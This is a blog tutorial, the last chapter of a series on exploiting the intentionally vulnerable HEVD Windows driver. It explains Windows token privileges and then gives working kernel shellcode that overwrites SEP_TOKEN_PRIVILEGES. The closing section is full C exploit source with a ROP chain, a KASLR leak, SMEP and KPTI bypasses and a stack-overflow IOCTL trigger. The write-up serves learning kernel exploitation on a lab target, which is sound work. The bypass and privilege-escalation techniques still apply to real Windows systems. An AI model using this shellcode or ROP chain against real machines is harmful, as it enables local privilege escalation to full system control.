Jan 8, 2023

[Cracking Windows Kernel with HEVD] Chapter 4: How do we write a shellcode to elevate privileges and gracefully return to userland?

The end is near

Throughout the previous four chapters, everything we have been doing was basically exploiting a stack-based buffer overflow and bypassing a few kernel mitigations. Apart from the kernel-specific memory mitigations, until this point the exploitation has been as vanilla as it gets: a stack overflow with no canary.

In this final post, we will dive into Windows privilege mechanism and use it to elevate our privileges. Then, we must return to userland. After all, there is no use in elevating privileges or executing code in ring0 if the computer is going to crash right after! The problem is we have corrupted our stack with our ROP payload. Not to mention the registers: we have corrupted them all. Restoring them would be impractical. That will be our main challenge today.

How privileges work on Windows

It would be difficult to cover how security works on Windows, or even how privileges work. I’ll cover the basics of privileges in this post. Later on I’m planning to write another post just on Windows security architecture, but with my current post scheduling, this could take as long as a century ^^ (sorry about that!)

"A privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer, such as shutting down the system, loading device drivers or changing the system time."

That is Microsoft’s definition of privileges on Windows. Privileges are not related to securable objects (such as files and folders), but to access to system resources and system related tasks. These privileges may be observed on a Windows terminal with the whoami command: whoami /priv.

This is what appears when a low-privilege user checks its own privileges:

Here we see an administrator:

As you may see, there are some privileges which appear only for the administrator. For each privilege, it can have a state: enabled or disabled. In reality, there are three possible attributes for a privilege: present, enabled and enabled by default. Present privileges are the ones shown by the whoami program. These privileges may be enabled or disabled. However, if a privilege is not present, it may not be enabled. The state is kind of straightforward: if it enabled, the user may use it. Otherwise, it must be enabled. The “enabled by default” attribute is also intuitive and needs no explanation.

Ok, so these privileges are associated to the user. But what about processes?

Well, there is a structure stored in kernel associated with each process named EPROCESS. It stores another very important data structure named TOKEN. Access token objects “include the identity and privileges of the user account associated with the process or thread”, as explained by Microsoft. When a user starts a new process (or thread), the system will create a copy of its access token and store it on the process structure. If we intend to elevate privileges of a process, this is the data structure with which we will mess.

Amongst many information stored in token struct, such as security identifier (SID) for user account, SID for groups of which the user is a member, impersonation level, etc, it actually stores the privileges held by the user (or the user’s group). These are the privileges of which I have spoken earlier! This guy is a data structure called _SEP_TOKEN_PRIVILEGES and its definition follows:

kd> dt _SEP_TOKEN_PRIVILEGES
nt!_SEP_TOKEN_PRIVILEGES
   +0x000 Present          : Uint8B
   +0x008 Enabled          : Uint8B
   +0x010 EnabledByDefault : Uint8B

That’s right! Each privilege is represented by a bit in three bitmasks: present, enabled and enabled by default. Each bit is a permission from the list below:

    2: SeCreateTokenPrivilege -> Create a token object
    3: SeAssignPrimaryTokenPrivilege -> Replace a process-level token
    4: SeLockMemoryPrivilege -> Lock pages in memory
    5: SeIncreaseQuotaPrivilege -> Increase quotas
    6: SeMachineAccountPrivilege -> Add workstations to the domain
    7: SeTcbPrivilege -> Act as part of the operating system
    8: SeSecurityPrivilege -> Manage auditing and security log
    9: SeTakeOwnershipPrivilege -> Take ownership of files/objects
    10: SeLoadDriverPrivilege -> Load and unload device drivers
    11: SeSystemProfilePrivilege -> Profile system performance
    12: SeSystemtimePrivilege -> Change the system time
    13: SeProfileSingleProcessPrivilege -> Profile a single process
    14: SeIncreaseBasePriorityPrivilege -> Increase scheduling priority
    15: SeCreatePagefilePrivilege -> Create a pagefile
    16: SeCreatePermanentPrivilege -> Create permanent shared objects
    17: SeBackupPrivilege -> Backup files and directories
    18: SeRestorePrivilege -> Restore files and directories
    19: SeShutdownPrivilege -> Shut down the system
    20: SeDebugPrivilege -> Debug programs
    21: SeAuditPrivilege -> Generate security audits
    22: SeSystemEnvironmentPrivilege -> Edit firmware environment values
    23: SeChangeNotifyPrivilege -> Receive notifications of changes to files or directories
    24: SeRemoteShutdownPrivilege -> Force shutdown from a remote system
    25: SeUndockPrivilege -> Remove computer from docking station
    26: SeSyncAgentPrivilege -> Synch directory service data
    27: SeEnableDelegationPrivilege -> Enable user accounts to be trusted for delegation
    28: SeManageVolumePrivilege -> Manage the files on a volume
    29: SeImpersonatePrivilege -> Impersonate a client after authentication
    30: SeCreateGlobalPrivilege -> Create global objects
    31: SeTrustedCredManAccessPrivilege -> Access Credential Manager as a trusted caller
    32: SeRelabelPrivilege -> Modify the mandatory integrity level of an object
    33: SeIncreaseWorkingSetPrivilege -> Allocate more memory for user applications
    34: SeTimeZonePrivilege -> Adjust the time zone of the computer's internal clock
    35: SeCreateSymbolicLinkPrivilege -> Required to create a symbolic link

Credit where its due, this list was found here. Thank you, Volatility Foundation.

You may observe that the list starts from the number 2 and goes way up to number 35. Why does it not start at zero, like everything else in computer science? Well, the answer is far from obvious. It is so unobvious that I do not now for sure, but I suspect that the two least significant bits must be zero so it is not “mistaken” by the number -1. If a vulnerability allows for an attacker to somehow change this structure (such as this one we are exploiting), it should be easier to set it to -1.

Ok, back to the exploit. “All” we have to do is change the SEP_TOKEN_PRIVILEGES structure, which resides in TOKEN structure, which resides in EPROCESS structure, to 0xffffffffc on all fields (present, enabled and enabled by default, although the last one is optional).

If we locate this structure in memory and alter it, we have our privilege escalation!

Carving a shellcode

As mentioned, we must locate the privileges structure to alter it, which resides inside the token structure. Given an EPROCESS structure, it is trivial to find the primary token with the PsReferencePrimaryToken method. It will return the token!

To use this method, we require a EPROCESS object. No problem! The PsLookupProcessByProcessId will give us just that, given that we provide a PID for the process.

With token structure at hand, we have to find privilege structure to alter it. The dt command on WinDBG will reveal the offset for the structure:

It resides on offset 0x40. Neat. The steps we must take, so far, are these:

From a PID, use PsLookupProcessByProcessId() function to obtain an EPROCESS object for the process which privileges will be elevated;
From this EPROCESS object, obtain TOKEN struct;
From TOKEN struct, obtain the SEP_TOKEN_PRIVILEGES struct at offset 0x40;
Alter each field of this structure to 0xffffffffc

Allright. Let’s write some assembly code:

mov rcx, <PID> ;The first argument to PsLookupProcessByProcessId() is the PID number. Will be adjusted dinamically. Rcx on Windows calling convention stores the first argument.
sub rsp, 0x8; The second argument given to PsLookupProcessByProcessId() is the EPROCESS struct to be filled (it is an out argument). I'm reserving 8 bytes for this in the stack.
mov rdx, rsp; Now placing the second argument, which is a pointer to the stack (the 8 bytes we just reserved for this) to rdx. Rdx on Windows calling convention stores the second argument, remember? 
movabs rbx, <ADDRESS OF PsLookupProcessByProcessId()> ;
call rbx ; Actually call the function! The EPROCESS structure will be in stack (RSP).

mov rcx, QWORD PTW [rsp] ; Moving RSP to the first and only argument of PsReferencePrimaryToken()
movabs rbx, <ADDRESS OF PsReferencePrimaryToken> ; 
call rbx ; Calling PsReferencePrimaryToken! The address for the struct will be on the return value, AKA rax register!
add rax, 0x40; Adjusting the offset. Now rax points directly to SEP_TOKEN_PRIVILEGES.
movabs rcx, 0xfffffffc ; The value of each SEP_TOKEN_PRIVILEGES is moved to rcx.
mov QWORD PTR [rax], rcx ; Now the magic happens! We change the first field in SEP_TOKEN_PRIVILEGES to 0xfffffffc. 
add rax, 0x8 ; Next field...
mov QWORD PTR [rax], rcx ; Changing the second field.
add rax, 0x8 ; Final field
mov QWORD PTR [rax], rcx ; Changing the third field.

There is one more thing we should do, which is return to userland gracefully.

Kristal discovered a nice approach to return to userland with sysret. Sysret is to syscall just as ret is to call, but with extra steps.

In reality, upon a normal return to userland, the OS restores the execution context and returns gracefully. What Kristal did, and I incentivate you to read his post, is to mimic the way the OS returns to userland. His approach did not work here because KPTI was enabled.

Windows has two approaches for returning. One for when KPTI is disabled and other for when it is enabled. Kristal - or any other person as far as I know - has not developed an approach for when KPTI is enabled. Well, neither did I.

Windows has a specific function to return to userland. It is called KiKernelSysretExit(). The first and naive approach I did was to jump to that function at the end of my shellcode and let the kernel do the hard lifting, instead of I doing it myself at the shellcode. And, to my surprise, it actually worked.

I added two extra lines to the shellcode:

movabs rbx, <ADDRESS_TO_SYSRET_KERNEL_FUNCTION>;
jmp rbx;

And the kernel did the rest!

I used my boy’s Vinicius brilliant shellcoding tools to transform my assembly code into opcodes. Then I put it in a variable and adjusted the addresses in runtime. My generate_shellcode() function looks like this now:

char *generate_shellcode() {
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11); //0x4e+11 is the size of the shellcode
	memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
	memcpy(shellcode + 3, &pid, 4); // Adjusting the PID
	memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8); //Adjusting the address for PsLookUpProcessByProcessId function
	memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8); //Adjusting PsReferencePrimaryToken function address
	memcpy(shellcode + 0x4e+1, &kernel_sysret, 8); // Adjusting sysret function address.
	return shellcode;
}

And boom! It worked!

The final exploit

I run the exploit:

On the left, we see my exploit’s debug messages. On the right, it spawned a CMD which will have its privileges elevated. I put a whoami /priv to assert that it is unprivileged.

When I press enter on the exploit terminal, the privileges are elevated.

Finally! The system did not crash and privileges were elevated. I will leave the full source code at the end of the post.

Conclusions

We did it! Phew, this took forever for me to write. I apologize for the extremely long delay. From this exercise, we may conclude a few things:

Windows kernel mitigations are not that powerful. Window’s KASLR is easily bypassable when you are running from integrity level medium or above. SMEP is useful, but there is a neat gadget to bypass it easily. KPTI was the hardest enemy, but can be bypassed by allocating an executable pool and jumping to it.
If we cannot restore the stack, we can just let the kernel do the heavy lifting by calling its own exit function.
Assembly programming is very useful for shellcoding at this level.

Hope you enjoyed it! See you next time.

Source code

#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>

// Name of the device
#define DEVICE_NAME	"\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL(Function) CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)

unsigned long long g_add_rsp_20h_ret = 0xa155de;


unsigned long long g_pop_rdi_pop_r14_pop_rbx_ret = 0x20a518;
unsigned long long g_xor_ecx_ecx_mov_rax_rcx_ret = 0x38cf53;
unsigned long long g_pop_rdx_ret = 0x416748;
unsigned long long g_push_rax_pop_rbx_ret = 0x20a263;
unsigned long long g_push_rax_pop_r13_ret = 0x5af724;
unsigned long long g_xchg_r8_r13_ret = 0x2c0da6;
unsigned long long g_mov_rcx_r8_mov_rax_rcx_ret = 0x93ac7a;
unsigned long long g_pop_r8_ret = 0x2017f1;
unsigned long long g_jmp_rbx = 0x408aa2;
unsigned long long kernel_ExAllocatePoolWithTag;
unsigned long long kernel_sysret = 0xa13dc0;
unsigned long long kernel_memcpy;


DWORD pid;

typedef struct sSepTokenPrivileges {
	UINT8 present;
	UINT8 enabled;
	UINT8 enabled_by_default;
} SEP_TOKEN_PRIVILEGES;

typedef NTSTATUS(*_PsLookupProcessByProcessId)(IN HANDLE, OUT PVOID *);
_PsLookupProcessByProcessId kernel_PsLookupProcessByProcessId;

typedef PVOID(*_PsReferencePrimaryToken)(PVOID);
_PsReferencePrimaryToken kernel_PsReferencePrimaryToken;

// Definição do número da IOCTL para o StackOverflow
#define STACK_OVERFLOW_IOCTL_NUMBER     IOCTL(0x800)

// Returns kernel base address
unsigned long long get_kernel_base_addr() {
	LPVOID drivers[1024];
	DWORD cbNeeded;

	EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);

	return (unsigned long long)drivers[0];
}

// Gets the handle for the device driver
HANDLE get_handle() {
	HANDLE h = CreateFileA(DEVICE_NAME,
		FILE_READ_ACCESS | FILE_WRITE_ACCESS,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
		NULL);

	if (h == INVALID_HANDLE_VALUE) {
		printf("Failed to get handle =(\n");
		return NULL;
	}
	return h;
}

void add_to_payload(char *in_buffer, SIZE_T *offset, unsigned long long *data, SIZE_T size)
{
	memcpy(in_buffer + *offset, data, size);
	printf("Wrote %lx to offset %u\n", *data, *offset);
	*offset += size;
}

PVOID get_kernel_symbol_addr(const char *symbol) {
	PVOID kernelBaseAddr;
	HMODULE userKernelHandle;
	PCHAR functionAddress;
	unsigned long long offset;

	kernelBaseAddr = (PVOID)get_kernel_base_addr();  // Loads kernel base address
	userKernelHandle = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe");  // Gets kernel binary

	if (userKernelHandle == INVALID_HANDLE_VALUE) {
		return NULL;
	}

	functionAddress = (PCHAR)GetProcAddress(userKernelHandle, symbol);  // Finds given symbol
	if (functionAddress == NULL) {
		// Could not find symbol
		return NULL;
	}

	offset = functionAddress - ((PCHAR)userKernelHandle);  // Subtracts the loaded binary's base address from the found address. This way, we will find the offset of the symbol for base address 0.
	return (PVOID)(((PCHAR)kernelBaseAddr) + offset);  // Adds the offset to the leaked base address.
}

void adjust_offsets()
{
	unsigned long long kernel_base_addr = get_kernel_base_addr();
	g_xor_ecx_ecx_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_rdi_pop_r14_pop_rbx_ret += kernel_base_addr;
	g_add_rsp_20h_ret += kernel_base_addr;
	g_pop_rdx_ret += kernel_base_addr;
	g_push_rax_pop_rbx_ret += kernel_base_addr;
	g_push_rax_pop_r13_ret += kernel_base_addr;
	g_xchg_r8_r13_ret += kernel_base_addr;
	g_mov_rcx_r8_mov_rax_rcx_ret += kernel_base_addr;
	g_pop_r8_ret += kernel_base_addr;
	g_jmp_rbx += kernel_base_addr;
	
	kernel_sysret += kernel_base_addr;
	kernel_ExAllocatePoolWithTag = (unsigned long long) get_kernel_symbol_addr("ExAllocatePoolWithTag");
	kernel_memcpy = (unsigned long long) get_kernel_symbol_addr("memcpy");
	kernel_PsLookupProcessByProcessId = (_PsLookupProcessByProcessId) get_kernel_symbol_addr("PsLookupProcessByProcessId");
	kernel_PsReferencePrimaryToken = (_PsReferencePrimaryToken) get_kernel_symbol_addr("PsReferencePrimaryToken");
	printf("Primary token: %xu \n", (ULONGLONG)kernel_PsReferencePrimaryToken - kernel_base_addr);
	printf("PsReferencePrimaryToken base addr: %xu\n", (ULONGLONG) kernel_PsReferencePrimaryToken - (ULONGLONG) kernel_base_addr);
}


DWORD spawnCmd() {
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	char cmd[] = "C:\\Windows\\System32\\cmd.exe";

	ZeroMemory(&si, sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&pi, sizeof(pi));

	// Start the child process. 
	if (!CreateProcess(NULL,	// No module name (use command line)
		cmd,					// Command line
		NULL,					// Process handle not inheritable
		NULL,					// Thread handle not inheritable
		FALSE,					// Set handle inheritance to FALSE
		CREATE_NEW_CONSOLE,     // No creation flags
		NULL,					// Use parent's environment block
		NULL,					// Use parent's starting directory 
		&si,					// Pointer to STARTUPINFO structure
		&pi)					// Pointer to PROCESS_INFORMATION structure
		)
	{
		printf("CreateProcess failed (%d).\n", GetLastError());
		return -1;
	}

	return pi.dwProcessId;
}

char *generate_shellcode() {
	char *shellcode = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x4e+11);
	memcpy(shellcode, "\x48\xc7\xc1\x78\x56\x34\x12\x48\x83\xec\x08\x48\x89\xe2\x48\xbb\x00\x00\x00\x00\xff\xff\xff\xff\xff\xd3\x48\x8b\x0c\x24\x48\xbb\x10\x32\x34\x12\xff\xff\xff\xff\xff\xd3\x48\x83\xc0\x40\x48\xb9\xfc\xff\xff\xff\x00\x00\x00\x00\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc0\x08\x48\x89\x08\x48\x83\xc4\x08\x48\xBB\xC0\x0D\x02\x1B\x05\xF8\xFF\xFF\xFF\xE3", 0x4e+11);
	memcpy(shellcode + 3, &pid, 4);
	memcpy(shellcode + 16, &kernel_PsLookupProcessByProcessId, 8);
	memcpy(shellcode + 32, &kernel_PsReferencePrimaryToken, 8);
	memcpy(shellcode + 0x4e+1, &kernel_sysret, 8);
	return shellcode;
}

//Does everything
void do_buffer_overflow(HANDLE h)
{
	SIZE_T in_buffer_size = 2072 + 8 * 15 + 0x20;
	PULONG in_buffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, in_buffer_size);
	memset((char *)in_buffer, 'A', in_buffer_size);
	
	SIZE_T offset = 2072;

	pid = spawnCmd();
	adjust_offsets();
	char *shellcode = generate_shellcode();

	unsigned long long size_of_copy = 0x4e+11;

	add_to_payload((char*)in_buffer, &offset, &g_xor_ecx_ecx_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_ExAllocatePoolWithTag, 8);
	add_to_payload((char*)in_buffer, &offset, &g_add_rsp_20h_ret, 8);
	offset += 0x20;

	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_rbx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_push_rax_pop_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_xchg_r8_r13_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_mov_rcx_r8_mov_rax_rcx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_rdx_ret, 8);
	add_to_payload((char*)in_buffer, &offset, (unsigned long long *)(&shellcode), 8);
	add_to_payload((char*)in_buffer, &offset, &g_pop_r8_ret, 8);
	add_to_payload((char*)in_buffer, &offset, &size_of_copy, 8);
	add_to_payload((char*)in_buffer, &offset, &kernel_memcpy, 8);
	add_to_payload((char*)in_buffer, &offset, &g_jmp_rbx, 8);
	

	system("pause");
	printf("Sending buffer.\n");
	//Sends buffer through IOCTL
	bool result = DeviceIoControl(h, STACK_OVERFLOW_IOCTL_NUMBER, in_buffer, (DWORD)in_buffer_size, NULL, 0, NULL, NULL);
	if (!result)
	{
		printf("IOCTL Failed: %X\n", GetLastError());
	}
	//Frees allocated memory
	HeapFree(GetProcessHeap(), 0, (LPVOID)in_buffer);
}


int main(int argc, char **argv)
{
	do_buffer_overflow(get_handle());
	system("pause");
}